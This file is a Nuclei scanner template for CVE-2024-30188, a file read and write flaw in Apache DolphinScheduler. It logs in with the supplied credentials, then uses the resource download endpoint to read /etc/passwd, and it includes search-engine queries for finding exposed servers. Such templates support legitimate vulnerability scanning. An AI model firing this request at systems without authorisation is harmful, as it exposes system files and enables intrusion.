nuclei-templates/http/cves/2024/CVE-2024-30188.yaml

75 lines
2.2 KiB
YAML

id: CVE-2024-30188
info:
name: Apache DolphinScheduler >= 3.1.0, < 3.2.2 Resource File Read And Write
author: iamnoooob,rootxharsh,pdresearch
severity: high
description: |
File read and write vulnerability in Apache DolphinScheduler, authenticated users can illegally access additional resource files. This issue affects Apache DolphinScheduler from 3.1.0 before 3.2.2.
reference:
- https://github.com/advisories/GHSA-4vv4-crw4-8pcw
- https://github.com/Mr-xn/Penetration_Testing_POC
- https://nvd.nist.gov/vuln/detail/CVE-2024-30188
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
cvss-score: 8.1
cve-id: CVE-2024-30188
epss-score: 0.00045
epss-percentile: 0.16536
cpe: cpe:2.3:a:apache:dolphinscheduler:*:*:*:*:*:*:*:*
metadata:
max-request: 2
verified: true
vendor: apache
product: dolphinscheduler
shodan-query: http.title:"dolphinscheduler"
fofa-query: title="dolphinscheduler"
google-query: intitle:"dolphinscheduler"
tags: cve,cve2024,dolphinscheduler,lfi,apache,authenticated
variables:
username: "{{username}}"
password: "{{password}}"
flow: http(1) && http(2)
http:
- raw:
- |-
POST /dolphinscheduler/login HTTP/1.1
Host: {{Hostname}}
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
userName={{username}}&userPassword={{password}}&ssoLoginUrl=
extractors:
- type: json
name: sessionId
part: body
json:
- ".data.sessionId"
internal: true
- raw:
- |
GET /dolphinscheduler/resources/download?fullName=file:///etc/passwd HTTP/1.1
Host: {{Hostname}}
sessionId: {{sessionId}}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: regex
part: content_type
regex:
- "application/json"
- type: status
status:
- 200
# digest: 490a00463044022018617a49bd6919a34d8916ada24eec9783f770395fa41f9d0f7dbc84c45eb1e6022001c14b06ad120960706547688dab6cc6035b7aadfb77191110db4526b1ee4c19:922c64590222798bb761d5b6d8e72950